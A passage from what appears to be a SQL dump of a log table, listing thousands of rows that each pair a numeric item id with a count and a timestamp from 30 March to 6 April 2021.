14:12:14'),(17711,1544,1,'2021-03-30','2021-03-30 15:31:26'),(17712,2769,1,'2021-03-30','2021-03-30 15:54:35'),(17713,484,1,'2021-03-30','2021-03-30 16:02:48'),(17714,1612,1,'2021-03-30','2021-03-30 16:38:30'),(17715,76,1,'2021-03-30','2021-03-30 16:38:43'),(17716,76,1,'2021-03-30','2021-03-30 16:39:42'),(17717,68,1,'2021-03-30','2021-03-30 16:40:05'),(17718,91,1,'2021-03-30','2021-03-30 16:40:26'),(17719,68,1,'2021-03-30','2021-03-30 16:40:43'),(17720,76,1,'2021-03-30','2021-03-30 16:40:50'),(17721,1612,1,'2021-03-30','2021-03-30 16:40:56'),(17722,1612,1,'2021-03-30','2021-03-30 16:42:31'),(17723,1588,1,'2021-03-30','2021-03-30 17:01:31'),(17724,1588,1,'2021-03-30','2021-03-30 17:02:10'),(17725,2161,1,'2021-03-30','2021-03-30 17:32:31'),(17726,2904,1,'2021-03-30','2021-03-30 17:33:09'),(17727,335,1,'2021-03-30','2021-03-30 17:33:23'),(17728,68,1,'2021-03-30','2021-03-30 17:33:46'),(17729,74,1,'2021-03-30','2021-03-30 17:58:16'),(17730,2904,1,'2021-03-30','2021-03-30 17:58:49'),(17731,1596,1,'2021-03-30','2021-03-30 18:28:08'),(17732,68,1,'2021-03-30','2021-03-30 18:28:16'),(17733,68,1,'2021-03-30','2021-03-30 18:28:33'),(17734,1596,1,'2021-03-30','2021-03-30 18:28:35'),(17735,1596,1,'2021-03-30','2021-03-30 18:28:39'),(17736,1594,1,'2021-03-30','2021-03-30 18:36:58'),(17737,3278,1,'2021-03-30','2021-03-30 18:37:05'),(17738,1594,1,'2021-03-30','2021-03-30 19:06:39'),(17739,1594,1,'2021-03-30','2021-03-30 19:06:43'),(17740,2457,1,'2021-03-30','2021-03-30 19:36:56'),(17741,1608,1,'2021-03-30','2021-03-30 19:39:37'),(17742,3058,1,'2021-03-30','2021-03-30 20:17:12'),(17743,1594,1,'2021-03-30','2021-03-30 20:26:27'),(17744,483,1,'2021-03-30','2021-03-30 21:07:29'),(17745,3245,1,'2021-03-30','2021-03-30 21:09:00'),(17746,477,1,'2021-03-30','2021-03-30 21:59:00'),(17747,469,1,'2021-03-30','2021-03-30 23:41:46'),(17748,2704,1,'2021-03-31','2021-03-31 00:33:12'),(17749,1612,1,'2021-03-31','2021-03-31 01:58:47'),(17750,484,1,'2021-03-31','2021-03-31 02:16:02'),(17751,1749,1,'2021-03-31','2021-03-31 03:01:53'),(17752,3251,1,'2021-03-31','2021-03-31 03:07:27'),(17753,3245,1,'2021-03-31','2021-03-31 03:59:15'),(17754,1608,1,'2021-03-31','2021-03-31 04:53:22'),(17755,1602,1,'2021-03-31','2021-03-31 05:18:10'),(17756,1602,1,'2021-03-31','2021-03-31 05:18:11'),(17757,1608,1,'2021-03-31','2021-03-31 05:23:29'),(17758,1602,1,'2021-03-31','2021-03-31 05:25:03'),(17759,3127,1,'2021-03-31','2021-03-31 05:41:54'),(17760,3282,1,'2021-03-31','2021-03-31 05:53:32'),(17761,3489,1,'2021-03-31','2021-03-31 06:31:15'),(17762,3027,1,'2021-03-31','2021-03-31 07:24:37'),(17763,1604,1,'2021-03-31','2021-03-31 08:13:04'),(17764,1594,1,'2021-03-31','2021-03-31 08:22:43'),(17765,1594,1,'2021-03-31','2021-03-31 08:23:03'),(17766,1600,1,'2021-03-31','2021-03-31 08:24:14'),(17767,1594,1,'2021-03-31','2021-03-31 08:26:15'),(17768,1594,1,'2021-03-31','2021-03-31 08:35:18'),(17769,1594,1,'2021-03-31','2021-03-31 08:35:29'),(17770,1594,1,'2021-03-31','2021-03-31 08:35:37'),(17771,87,1,'2021-03-31','2021-03-31 08:50:55'),(17772,3278,1,'2021-03-31','2021-03-31 09:07:28'),(17773,1594,1,'2021-03-31','2021-03-31 09:45:43'),(17774,89,1,'2021-03-31','2021-03-31 09:47:39'),(17775,1594,1,'2021-03-31','2021-03-31 09:48:34'),(17776,80,1,'2021-03-31','2021-03-31 10:12:00'),(17777,2457,1,'2021-03-31','2021-03-31 11:03:41'),(17778,2178,1,'2021-03-31','2021-03-31 11:27:44'),(17779,2178,1,'2021-03-31','2021-03-31 11:30:21'),(17780,1602,1,'2021-03-31','2021-03-31 12:40:47'),(17781,1582,1,'2021-03-31','2021-03-31 13:19:53'),(17782,1608,1,'2021-03-31','2021-03-31 13:50:26'),(17783,1586,1,'2021-03-31','2021-03-31 13:53:49'),(17784,2904,1,'2021-03-31','2021-03-31 13:55:50'),(17785,2904,1,'2021-03-31','2021-03-31 13:56:48'),(17786,72,1,'2021-03-31','2021-03-31 14:07:40'),(17787,3585,1,'2021-03-31','2021-03-31 14:08:14'),(17788,72,1,'2021-03-31','2021-03-31 14:08:58'),(17789,3541,1,'2021-03-31','2021-03-31 14:12:29'),(17790,3079,1,'2021-03-31','2021-03-31 14:13:49'),(17791,1602,1,'2021-03-31','2021-03-31 14:18:13'),(17792,3083,1,'2021-03-31','2021-03-31 14:42:14'),(17793,2309,1,'2021-03-31','2021-03-31 14:52:17'),(17794,2769,1,'2021-03-31','2021-03-31 15:01:37'),(17795,2769,1,'2021-03-31','2021-03-31 15:01:38'),(17796,1608,1,'2021-03-31','2021-03-31 15:19:33'),(17797,1582,1,'2021-03-31','2021-03-31 15:26:53'),(17798,1596,1,'2021-03-31','2021-03-31 15:42:05'),(17799,1582,1,'2021-03-31','2021-03-31 15:58:36'),(17800,1600,1,'2021-03-31','2021-03-31 17:17:08'),(17801,1600,1,'2021-03-31','2021-03-31 17:35:12'),(17802,1600,1,'2021-03-31','2021-03-31 17:35:14'),(17803,91,1,'2021-03-31','2021-03-31 17:41:12'),(17804,1726,1,'2021-03-31','2021-03-31 17:43:20'),(17805,1602,1,'2021-03-31','2021-03-31 18:25:47'),(17806,2769,1,'2021-03-31','2021-03-31 18:51:49'),(17807,2769,1,'2021-03-31','2021-03-31 18:51:50'),(17808,68,1,'2021-03-31','2021-03-31 18:53:08'),(17809,1544,1,'2021-03-31','2021-03-31 19:15:12'),(17810,1596,1,'2021-03-31','2021-03-31 19:15:53'),(17811,472,1,'2021-03-31','2021-03-31 19:46:55'),(17812,1608,1,'2021-03-31','2021-03-31 20:45:58'),(17813,1608,1,'2021-03-31','2021-03-31 20:48:23'),(17814,2558,1,'2021-03-31','2021-03-31 20:48:42'),(17815,1608,1,'2021-03-31','2021-03-31 20:48:59'),(17816,477,1,'2021-03-31','2021-03-31 21:26:21'),(17817,1600,1,'2021-03-31','2021-03-31 21:34:27'),(17818,1582,1,'2021-03-31','2021-03-31 22:09:25'),(17819,1586,1,'2021-03-31','2021-03-31 22:34:38'),(17820,2609,1,'2021-03-31','2021-03-31 23:06:04'),(17821,1586,1,'2021-03-31','2021-03-31 23:34:56'),(17822,1608,1,'2021-04-01','2021-04-01 00:15:30'),(17823,3104,1,'2021-04-01','2021-04-01 01:25:11'),(17824,1608,1,'2021-04-01','2021-04-01 01:45:30'),(17825,1592,1,'2021-04-01','2021-04-01 02:01:29'),(17826,3092,1,'2021-04-01','2021-04-01 02:15:37'),(17827,2161,1,'2021-04-01','2021-04-01 02:45:28'),(17828,1544,1,'2021-04-01','2021-04-01 02:45:29'),(17829,3282,1,'2021-04-01','2021-04-01 02:45:31'),(17830,3282,1,'2021-04-01','2021-04-01 03:15:29'),(17831,1612,1,'2021-04-01','2021-04-01 03:19:42'),(17832,1604,1,'2021-04-01','2021-04-01 03:25:47'),(17833,2156,1,'2021-04-01','2021-04-01 04:06:20'),(17834,2420,1,'2021-04-01','2021-04-01 05:07:08'),(17835,1612,1,'2021-04-01','2021-04-01 07:36:31'),(17836,1600,1,'2021-04-01','2021-04-01 08:39:16'),(17837,2609,1,'2021-04-01','2021-04-01 09:02:25'),(17838,1600,1,'2021-04-01','2021-04-01 09:23:39'),(17839,1612,1,'2021-04-01','2021-04-01 09:52:53'),(17840,3045,1,'2021-04-01','2021-04-01 09:59:43'),(17841,1586,1,'2021-04-01','2021-04-01 10:18:01'),(17842,3045,1,'2021-04-01','2021-04-01 11:18:58'),(17843,3534,1,'2021-04-01','2021-04-01 11:21:56'),(17844,3297,1,'2021-04-01','2021-04-01 11:22:49'),(17845,72,1,'2021-04-01','2021-04-01 11:35:07'),(17846,335,1,'2021-04-01','2021-04-01 11:36:08'),(17847,108,1,'2021-04-01','2021-04-01 11:37:31'),(17848,2503,1,'2021-04-01','2021-04-01 11:38:28'),(17849,1602,1,'2021-04-01','2021-04-01 12:46:41'),(17850,3099,1,'2021-04-01','2021-04-01 12:48:35'),(17851,1604,1,'2021-04-01','2021-04-01 13:14:10'),(17852,3313,1,'2021-04-01','2021-04-01 13:15:14'),(17853,1604,1,'2021-04-01','2021-04-01 13:16:02'),(17854,1604,1,'2021-04-01','2021-04-01 13:17:30'),(17855,68,1,'2021-04-01','2021-04-01 13:47:29'),(17856,3482,1,'2021-04-01','2021-04-01 13:54:45'),(17857,2309,1,'2021-04-01','2021-04-01 14:12:37'),(17858,1594,1,'2021-04-01','2021-04-01 14:23:24'),(17859,87,1,'2021-04-01','2021-04-01 14:23:38'),(17860,68,1,'2021-04-01','2021-04-01 14:24:00'),(17861,91,1,'2021-04-01','2021-04-01 14:24:10'),(17862,1582,1,'2021-04-01','2021-04-01 14:26:08'),(17863,1614,1,'2021-04-01','2021-04-01 14:51:29'),(17864,3482,1,'2021-04-01','2021-04-01 14:56:03'),(17865,3030,1,'2021-04-01','2021-04-01 15:44:53'),(17866,3482,1,'2021-04-01','2021-04-01 16:03:36'),(17867,68,1,'2021-04-01','2021-04-01 16:03:58'),(17868,80,1,'2021-04-01','2021-04-01 16:05:32'),(17869,1870,1,'2021-04-01','2021-04-01 16:13:39'),(17870,2161,1,'2021-04-01','2021-04-01 16:19:36'),(17871,1598,1,'2021-04-01','2021-04-01 16:32:42'),(17872,2769,1,'2021-04-01','2021-04-01 16:45:00'),(17873,84,1,'2021-04-01','2021-04-01 16:45:18'),(17874,2769,1,'2021-04-01','2021-04-01 16:45:58'),(17875,1598,1,'2021-04-01','2021-04-01 16:46:58'),(17876,3585,1,'2021-04-01','2021-04-01 17:05:06'),(17877,1588,1,'2021-04-01','2021-04-01 17:08:40'),(17878,1588,1,'2021-04-01','2021-04-01 17:08:42'),(17879,1588,1,'2021-04-01','2021-04-01 17:08:43'),(17880,1588,1,'2021-04-01','2021-04-01 17:08:52'),(17881,1602,1,'2021-04-01','2021-04-01 17:16:14'),(17882,1594,1,'2021-04-01','2021-04-01 18:33:43'),(17883,108,1,'2021-04-01','2021-04-01 19:41:54'),(17884,2609,1,'2021-04-01','2021-04-01 19:42:00'),(17885,2309,1,'2021-04-01','2021-04-01 20:28:06'),(17886,1582,1,'2021-04-01','2021-04-01 20:31:18'),(17887,1598,1,'2021-04-01','2021-04-01 20:48:36'),(17888,1600,1,'2021-04-01','2021-04-01 21:19:29'),(17889,1590,1,'2021-04-01','2021-04-01 22:45:20'),(17890,1590,1,'2021-04-01','2021-04-01 22:46:13'),(17891,1590,1,'2021-04-01','2021-04-01 22:46:31'),(17892,3541,1,'2021-04-01','2021-04-01 22:47:59'),(17893,1590,1,'2021-04-01','2021-04-01 22:49:47'),(17894,1602,1,'2021-04-01','2021-04-01 23:04:05'),(17895,1608,1,'2021-04-01','2021-04-01 23:52:59'),(17896,467,1,'2021-04-01','2021-04-01 23:53:54'),(17897,1695,1,'2021-04-02','2021-04-02 00:22:59'),(17898,1695,1,'2021-04-02','2021-04-02 00:52:57'),(17899,3430,1,'2021-04-02','2021-04-02 01:11:49'),(17900,1602,1,'2021-04-02','2021-04-02 01:28:14'),(17901,91,1,'2021-04-02','2021-04-02 02:18:00'),(17902,1602,1,'2021-04-02','2021-04-02 02:29:20'),(17903,76,1,'2021-04-02','2021-04-02 02:31:38'),(17904,2769,1,'2021-04-02','2021-04-02 03:11:29'),(17905,2309,1,'2021-04-02','2021-04-02 06:22:05'),(17906,3045,1,'2021-04-02','2021-04-02 07:22:23'),(17907,1594,1,'2021-04-02','2021-04-02 08:12:06'),(17908,1600,1,'2021-04-02','2021-04-02 09:13:14'),(17909,570,1,'2021-04-02','2021-04-02 09:51:48'),(17910,3430,1,'2021-04-02','2021-04-02 10:13:09'),(17911,1726,1,'2021-04-02','2021-04-02 10:17:40'),(17912,2503,1,'2021-04-02','2021-04-02 10:42:25'),(17913,1586,1,'2021-04-02','2021-04-02 10:43:38'),(17914,1870,1,'2021-04-02','2021-04-02 11:43:38'),(17915,3269,1,'2021-04-02','2021-04-02 11:53:26'),(17916,467,1,'2021-04-02','2021-04-02 12:06:48'),(17917,1614,1,'2021-04-02','2021-04-02 12:21:01'),(17918,1614,1,'2021-04-02','2021-04-02 12:26:10'),(17919,3038,1,'2021-04-02','2021-04-02 12:29:35'),(17920,1598,1,'2021-04-02','2021-04-02 12:51:58'),(17921,1598,1,'2021-04-02','2021-04-02 12:51:58'),(17922,1598,1,'2021-04-02','2021-04-02 12:52:00'),(17923,1586,1,'2021-04-02','2021-04-02 14:24:37'),(17924,1586,1,'2021-04-02','2021-04-02 14:24:39'),(17925,1586,1,'2021-04-02','2021-04-02 14:24:40'),(17926,1586,1,'2021-04-02','2021-04-02 14:24:59'),(17927,570,1,'2021-04-02','2021-04-02 15:04:31'),(17928,1606,1,'2021-04-02','2021-04-02 15:04:46'),(17929,80,1,'2021-04-02','2021-04-02 15:05:47'),(17930,1606,1,'2021-04-02','2021-04-02 15:06:59'),(17931,483,1,'2021-04-02','2021-04-02 15:44:03'),(17932,91,1,'2021-04-02','2021-04-02 16:01:54'),(17933,2704,1,'2021-04-02','2021-04-02 16:22:09'),(17934,2704,1,'2021-04-02','2021-04-02 16:22:27'),(17935,1602,1,'2021-04-02','2021-04-02 16:24:26'),(17936,2704,1,'2021-04-02','2021-04-02 16:29:20'),(17937,335,1,'2021-04-02','2021-04-02 16:34:00'),(17938,68,1,'2021-04-02','2021-04-02 16:53:36'),(17939,84,1,'2021-04-02','2021-04-02 16:54:01'),(17940,68,1,'2021-04-02','2021-04-02 16:54:21'),(17941,1612,1,'2021-04-02','2021-04-02 17:05:37'),(17942,2748,1,'2021-04-02','2021-04-02 17:06:13'),(17943,2558,1,'2021-04-02','2021-04-02 17:06:32'),(17944,2748,1,'2021-04-02','2021-04-02 17:07:36'),(17945,2617,1,'2021-04-02','2021-04-02 17:07:41'),(17946,2748,1,'2021-04-02','2021-04-02 17:09:01'),(17947,2775,1,'2021-04-02','2021-04-02 17:09:08'),(17948,2748,1,'2021-04-02','2021-04-02 17:10:10'),(17949,2558,1,'2021-04-02','2021-04-02 17:10:21'),(17950,1612,1,'2021-04-02','2021-04-02 17:11:58'),(17951,2748,1,'2021-04-02','2021-04-02 17:12:14'),(17952,1612,1,'2021-04-02','2021-04-02 17:13:22'),(17953,2769,1,'2021-04-02','2021-04-02 17:13:35'),(17954,1612,1,'2021-04-02','2021-04-02 17:14:10'),(17955,1588,1,'2021-04-02','2021-04-02 17:24:07'),(17956,2457,1,'2021-04-02','2021-04-02 17:40:07'),(17957,2751,1,'2021-04-02','2021-04-02 17:46:16'),(17958,1594,1,'2021-04-02','2021-04-02 17:54:03'),(17959,570,1,'2021-04-02','2021-04-02 18:08:56'),(17960,1586,1,'2021-04-02','2021-04-02 18:24:49'),(17961,1604,1,'2021-04-02','2021-04-02 18:44:27'),(17962,2309,1,'2021-04-02','2021-04-02 19:04:22'),(17963,1598,1,'2021-04-02','2021-04-02 19:14:28'),(17964,3005,1,'2021-04-02','2021-04-02 19:44:45'),(17965,3275,1,'2021-04-02','2021-04-02 19:55:01'),(17966,1614,1,'2021-04-02','2021-04-02 20:35:40'),(17967,80,1,'2021-04-02','2021-04-02 20:36:51'),(17968,1614,1,'2021-04-02','2021-04-02 20:37:35'),(17969,76,1,'2021-04-02','2021-04-02 20:37:53'),(17970,1614,1,'2021-04-02','2021-04-02 20:38:18'),(17971,1582,1,'2021-04-02','2021-04-02 21:04:02'),(17972,1582,1,'2021-04-02','2021-04-02 21:04:05'),(17973,3259,1,'2021-04-02','2021-04-02 21:05:11'),(17974,3259,1,'2021-04-02','2021-04-02 21:05:11'),(17975,2309,1,'2021-04-02','2021-04-02 22:45:48'),(17976,1594,1,'2021-04-02','2021-04-02 22:50:12'),(17977,1592,1,'2021-04-03','2021-04-03 00:35:54'),(17978,2252,1,'2021-04-03','2021-04-03 00:46:54'),(17979,3041,1,'2021-04-03','2021-04-03 02:30:48'),(17980,1602,1,'2021-04-03','2021-04-03 03:26:20'),(17981,2309,1,'2021-04-03','2021-04-03 04:16:52'),(17982,1870,1,'2021-04-03','2021-04-03 05:57:29'),(17983,3034,1,'2021-04-03','2021-04-03 06:07:41'),(17984,1586,1,'2021-04-03','2021-04-03 06:17:41'),(17985,1778,1,'2021-04-03','2021-04-03 07:29:05'),(17986,1586,1,'2021-04-03','2021-04-03 08:21:49'),(17987,1776,1,'2021-04-03','2021-04-03 09:47:52'),(17988,1604,1,'2021-04-03','2021-04-03 09:59:31'),(17989,3243,1,'2021-04-03','2021-04-03 10:19:40'),(17990,80,1,'2021-04-03','2021-04-03 11:13:05'),(17991,3243,1,'2021-04-03','2021-04-03 11:30:39'),(17992,2309,1,'2021-04-03','2021-04-03 11:45:30'),(17993,1594,1,'2021-04-03','2021-04-03 11:46:22'),(17994,2419,1,'2021-04-03','2021-04-03 12:31:22'),(17995,2309,1,'2021-04-03','2021-04-03 13:41:49'),(17996,87,1,'2021-04-03','2021-04-03 13:51:52'),(17997,2769,1,'2021-04-03','2021-04-03 14:41:58'),(17998,1726,1,'2021-04-03','2021-04-03 15:08:15'),(17999,1582,1,'2021-04-03','2021-04-03 15:31:53'),(18000,3034,1,'2021-04-03','2021-04-03 15:32:30'),(18001,2704,1,'2021-04-03','2021-04-03 15:51:11'),(18002,2704,1,'2021-04-03','2021-04-03 15:51:14'),(18003,2704,1,'2021-04-03','2021-04-03 15:51:24'),(18004,2704,1,'2021-04-03','2021-04-03 15:51:25'),(18005,1586,1,'2021-04-03','2021-04-03 15:52:53'),(18006,1606,1,'2021-04-03','2021-04-03 16:12:35'),(18007,1870,1,'2021-04-03','2021-04-03 16:32:20'),(18008,1586,1,'2021-04-03','2021-04-03 16:56:36'),(18009,3107,1,'2021-04-03','2021-04-03 17:33:16'),(18010,3107,1,'2021-04-03','2021-04-03 17:33:20'),(18011,3245,1,'2021-04-03','2021-04-03 18:23:16'),(18012,1600,1,'2021-04-03','2021-04-03 18:23:34'),(18013,1604,1,'2021-04-03','2021-04-03 18:26:12'),(18014,2309,1,'2021-04-03','2021-04-03 18:43:39'),(18015,1776,1,'2021-04-03','2021-04-03 19:05:41'),(18016,1778,1,'2021-04-03','2021-04-03 20:35:42'),(18017,3498,1,'2021-04-03','2021-04-03 22:07:58'),(18018,1544,1,'2021-04-03','2021-04-03 22:35:00'),(18019,1586,1,'2021-04-03','2021-04-03 23:22:30'),(18020,91,1,'2021-04-04','2021-04-04 00:04:09'),(18021,2309,1,'2021-04-04','2021-04-04 03:26:49'),(18022,2457,1,'2021-04-04','2021-04-04 03:27:45'),(18023,68,1,'2021-04-04','2021-04-04 03:31:29'),(18024,1604,1,'2021-04-04','2021-04-04 03:36:48'),(18025,68,1,'2021-04-04','2021-04-04 04:13:45'),(18026,2309,1,'2021-04-04','2021-04-04 06:06:50'),(18027,2991,1,'2021-04-04','2021-04-04 06:35:14'),(18028,1544,1,'2021-04-04','2021-04-04 08:57:19'),(18029,1612,1,'2021-04-04','2021-04-04 08:57:34'),(18030,1612,1,'2021-04-04','2021-04-04 08:57:56'),(18031,2309,1,'2021-04-04','2021-04-04 09:29:43'),(18032,476,1,'2021-04-04','2021-04-04 09:57:41'),(18033,2309,1,'2021-04-04','2021-04-04 10:25:52'),(18034,476,1,'2021-04-04','2021-04-04 10:38:09'),(18035,2704,1,'2021-04-04','2021-04-04 11:51:32'),(18036,1608,1,'2021-04-04','2021-04-04 11:54:13'),(18037,2704,1,'2021-04-04','2021-04-04 12:30:18'),(18038,1604,1,'2021-04-04','2021-04-04 12:38:25'),(18039,1582,1,'2021-04-04','2021-04-04 12:48:29'),(18040,2775,1,'2021-04-04','2021-04-04 13:15:51'),(18041,1870,1,'2021-04-04','2021-04-04 13:18:52'),(18042,3269,1,'2021-04-04','2021-04-04 13:28:47'),(18043,1608,1,'2021-04-04','2021-04-04 14:14:00'),(18044,570,1,'2021-04-04','2021-04-04 15:05:05'),(18045,2159,1,'2021-04-04','2021-04-04 15:10:31'),(18046,1586,1,'2021-04-04','2021-04-04 15:56:59'),(18047,1586,1,'2021-04-04','2021-04-04 15:57:37'),(18048,1600,1,'2021-04-04','2021-04-04 16:00:13'),(18049,1586,1,'2021-04-04','2021-04-04 16:09:08'),(18050,3282,1,'2021-04-04','2021-04-04 16:09:15'),(18051,1600,1,'2021-04-04','2021-04-04 16:31:45'),(18052,1600,1,'2021-04-04','2021-04-04 16:32:09'),(18053,1598,1,'2021-04-04','2021-04-04 16:47:47'),(18054,1749,1,'2021-04-04','2021-04-04 16:49:40'),(18055,1749,1,'2021-04-04','2021-04-04 17:09:49'),(18056,1600,1,'2021-04-04','2021-04-04 17:29:49'),(18057,1596,1,'2021-04-04','2021-04-04 17:34:46'),(18058,1586,1,'2021-04-04','2021-04-04 20:17:01'),(18059,2309,1,'2021-04-04','2021-04-04 20:20:46'),(18060,3430,1,'2021-04-04','2021-04-04 20:49:23'),(18061,3489,1,'2021-04-04','2021-04-04 20:49:28'),(18062,3498,1,'2021-04-04','2021-04-04 20:49:40'),(18063,3430,1,'2021-04-04','2021-04-04 20:49:40'),(18064,3486,1,'2021-04-04','2021-04-04 20:49:43'),(18065,3486,1,'2021-04-04','2021-04-04 20:49:50'),(18066,3479,1,'2021-04-04','2021-04-04 20:49:51'),(18067,3531,1,'2021-04-04','2021-04-04 20:49:51'),(18068,3531,1,'2021-04-04','2021-04-04 20:49:52'),(18069,3534,1,'2021-04-04','2021-04-04 20:49:52'),(18070,3489,1,'2021-04-04','2021-04-04 20:49:53'),(18071,3438,1,'2021-04-04','2021-04-04 20:49:53'),(18072,3316,1,'2021-04-04','2021-04-04 20:49:56'),(18073,3498,1,'2021-04-04','2021-04-04 20:50:00'),(18074,3534,1,'2021-04-04','2021-04-04 20:50:08'),(18075,3307,1,'2021-04-04','2021-04-04 20:50:08'),(18076,3438,1,'2021-04-04','2021-04-04 20:50:08'),(18077,3482,1,'2021-04-04','2021-04-04 20:50:09'),(18078,3313,1,'2021-04-04','2021-04-04 20:50:12'),(18079,2956,1,'2021-04-04','2021-04-04 20:50:25'),(18080,3430,1,'2021-04-04','2021-04-04 20:50:27'),(18081,3498,1,'2021-04-04','2021-04-04 20:50:27'),(18082,3316,1,'2021-04-04','2021-04-04 20:50:36'),(18083,1586,1,'2021-04-04','2021-04-04 20:50:54'),(18084,3438,1,'2021-04-04','2021-04-04 20:51:09'),(18085,3482,1,'2021-04-04','2021-04-04 20:51:12'),(18086,1612,1,'2021-04-05','2021-04-05 01:39:09'),(18087,2503,1,'2021-04-05','2021-04-05 01:41:52'),(18088,68,1,'2021-04-05','2021-04-05 01:45:08'),(18089,1600,1,'2021-04-05','2021-04-05 04:12:29'),(18090,2309,1,'2021-04-05','2021-04-05 05:33:39'),(18091,1770,1,'2021-04-05','2021-04-05 07:20:53'),(18092,467,1,'2021-04-05','2021-04-05 07:23:25'),(18093,1604,1,'2021-04-05','2021-04-05 07:46:06'),(18094,1604,1,'2021-04-05','2021-04-05 07:46:06'),(18095,1604,1,'2021-04-05','2021-04-05 07:46:20'),(18096,1586,1,'2021-04-05','2021-04-05 08:06:52'),(18097,1586,1,'2021-04-05','2021-04-05 08:06:54'),(18098,1586,1,'2021-04-05','2021-04-05 08:06:58'),(18099,3251,1,'2021-04-05','2021-04-05 08:34:06'),(18100,1586,1,'2021-04-05','2021-04-05 08:36:29'),(18101,1586,1,'2021-04-05','2021-04-05 08:38:31'),(18102,2769,1,'2021-04-05','2021-04-05 09:04:31'),(18103,2159,1,'2021-04-05','2021-04-05 10:21:11'),(18104,2159,1,'2021-04-05','2021-04-05 10:22:05'),(18105,2159,1,'2021-04-05','2021-04-05 10:24:42'),(18106,2159,1,'2021-04-05','2021-04-05 10:25:20'),(18107,2159,1,'2021-04-05','2021-04-05 10:26:23'),(18108,1594,1,'2021-04-05','2021-04-05 10:59:44'),(18109,1870,1,'2021-04-05','2021-04-05 11:16:53'),(18110,1586,1,'2021-04-05','2021-04-05 11:25:50'),(18111,3269,1,'2021-04-05','2021-04-05 11:32:16'),(18112,91,1,'2021-04-05','2021-04-05 11:37:20'),(18113,1602,1,'2021-04-05','2021-04-05 11:57:37'),(18114,1600,1,'2021-04-05','2021-04-05 13:35:08'),(18115,1602,1,'2021-04-05','2021-04-05 14:00:06'),(18116,2297,1,'2021-04-05','2021-04-05 14:00:57'),(18117,1582,1,'2021-04-05','2021-04-05 14:10:46'),(18118,1606,1,'2021-04-05','2021-04-05 15:35:18'),(18119,1592,1,'2021-04-05','2021-04-05 16:04:59'),(18120,1596,1,'2021-04-05','2021-04-05 17:06:46'),(18121,2704,1,'2021-04-05','2021-04-05 17:20:05'),(18122,2704,1,'2021-04-05','2021-04-05 17:20:34'),(18123,2704,1,'2021-04-05','2021-04-05 17:21:18'),(18124,1594,1,'2021-04-05','2021-04-05 17:39:57'),(18125,2309,1,'2021-04-05','2021-04-05 17:59:24'),(18126,1586,1,'2021-04-05','2021-04-05 18:04:09'),(18127,570,1,'2021-04-05','2021-04-05 18:05:27'),(18128,108,1,'2021-04-05','2021-04-05 18:08:23'),(18129,1600,1,'2021-04-05','2021-04-05 18:24:02'),(18130,1600,1,'2021-04-05','2021-04-05 18:24:06'),(18131,1600,1,'2021-04-05','2021-04-05 18:24:07'),(18132,1598,1,'2021-04-05','2021-04-05 18:25:43'),(18133,1598,1,'2021-04-05','2021-04-05 18:25:44'),(18134,1598,1,'2021-04-05','2021-04-05 18:25:48'),(18135,1598,1,'2021-04-05','2021-04-05 18:25:49'),(18136,1600,1,'2021-04-05','2021-04-05 18:26:27'),(18137,1586,1,'2021-04-05','2021-04-05 18:48:31'),(18138,1586,1,'2021-04-05','2021-04-05 18:49:34'),(18139,1586,1,'2021-04-05','2021-04-05 18:57:12'),(18140,1713,1,'2021-04-05','2021-04-05 18:59:35'),(18141,1586,1,'2021-04-05','2021-04-05 19:32:45'),(18142,1586,1,'2021-04-05','2021-04-05 19:32:46'),(18143,1586,1,'2021-04-05','2021-04-05 19:33:24'),(18144,2769,1,'2021-04-05','2021-04-05 19:49:14'),(18145,2769,1,'2021-04-05','2021-04-05 19:49:15'),(18146,2769,1,'2021-04-05','2021-04-05 20:10:42'),(18147,1608,1,'2021-04-05','2021-04-05 20:19:26'),(18148,1608,1,'2021-04-05','2021-04-05 20:19:32'),(18149,2558,1,'2021-04-05','2021-04-05 20:22:26'),(18150,2558,1,'2021-04-05','2021-04-05 20:22:33'),(18151,1600,1,'2021-04-05','2021-04-05 21:57:00'),(18152,1600,1,'2021-04-05','2021-04-05 21:57:03'),(18153,1600,1,'2021-04-05','2021-04-05 21:57:05'),(18154,1600,1,'2021-04-05','2021-04-05 21:59:45'),(18155,1600,1,'2021-04-05','2021-04-05 22:00:26'),(18156,1600,1,'2021-04-05','2021-04-05 22:03:23'),(18157,1600,1,'2021-04-05','2021-04-05 22:03:37'),(18158,1594,1,'2021-04-05','2021-04-05 22:30:48'),(18159,1594,1,'2021-04-05','2021-04-05 22:31:58'),(18160,1594,1,'2021-04-05','2021-04-05 22:33:10'),(18161,2704,1,'2021-04-05','2021-04-05 23:01:53'),(18162,1608,1,'2021-04-05','2021-04-05 23:03:57'),(18163,2309,1,'2021-04-05','2021-04-05 23:04:21'),(18164,2704,1,'2021-04-05','2021-04-05 23:05:19'),(18165,1726,1,'2021-04-05','2021-04-05 23:55:51'),(18166,1726,1,'2021-04-06','2021-04-06 01:21:56'),(18167,2813,1,'2021-04-06','2021-04-06 03:37:12'),(18168,2309,1,'2021-04-06','2021-04-06 04:40:48'),(18169,2309,1,'2021-04-06','2021-04-06 04:41:01'),(18170,1544,1,'2021-04-06','2021-04-06 04:47:47'),(18171,3257,1,'2021-04-06','2021-04-06 04:47:51'),(18172,1594,1,'2021-04-06','2021-04-06 05:37:54'),(18173,2309,1,'2021-04-06','2021-04-06 06:18:13'),(18174,1594,1,'2021-04-06','2021-04-06 06:47:39'),(18175,1594,1,'2021-04-06','2021-04-06 06:48:27'),(18176,80,1,'2021-04-06','2021-04-06 07:46:44'),(18177,3282,1,'2021-04-06','2021-04-06 08:00:13'),(18178,3109,1,'2021-04-06','2021-04-06 08:16:20'),(18179,80,1,'2021-04-06','2021-04-06 08:55:56'),(18180,80,1,'2021-04-06','2021-04-06 08:56:35'),(18181,1726,1,'2021-04-06','2021-04-06 09:01:42'),(18182,1586,1,'2021-04-06','2021-04-06 09:10:26'),(18183,1598,1,'2021-04-06','2021-04-06 09:14:28'),(18184,1598,1,'2021-04-06','2021-04-06 09:14:48'),(18185,1588,1,'2021-04-06','2021-04-06 09:40:00'),(18186,1600,1,'2021-04-06','2021-04-06 09:49:24'),(18187,570,1,'2021-04-06','2021-04-06 09:50:17'),(18188,1600,1,'2021-04-06','2021-04-06 09:53:46'),(18189,1608,1,'2021-04-06','2021-04-06 10:36:52'),(18190,2704,1,'2021-04-06','2021-04-06 10:37:05'),(18191,1586,1,'2021-04-06','2021-04-06 10:59:07'),(18192,2457,1,'2021-04-06','2021-04-06 11:09:47'),(18193,2457,1,'2021-04-06','2021-04-06 11:09:51'),(18194,80,1,'2021-04-06','2021-04-06 11:10:03'),(18195,2457,1,'2021-04-06','2021-04-06 11:10:17'),(18196,80,1,'2021-04-06','2021-04-06 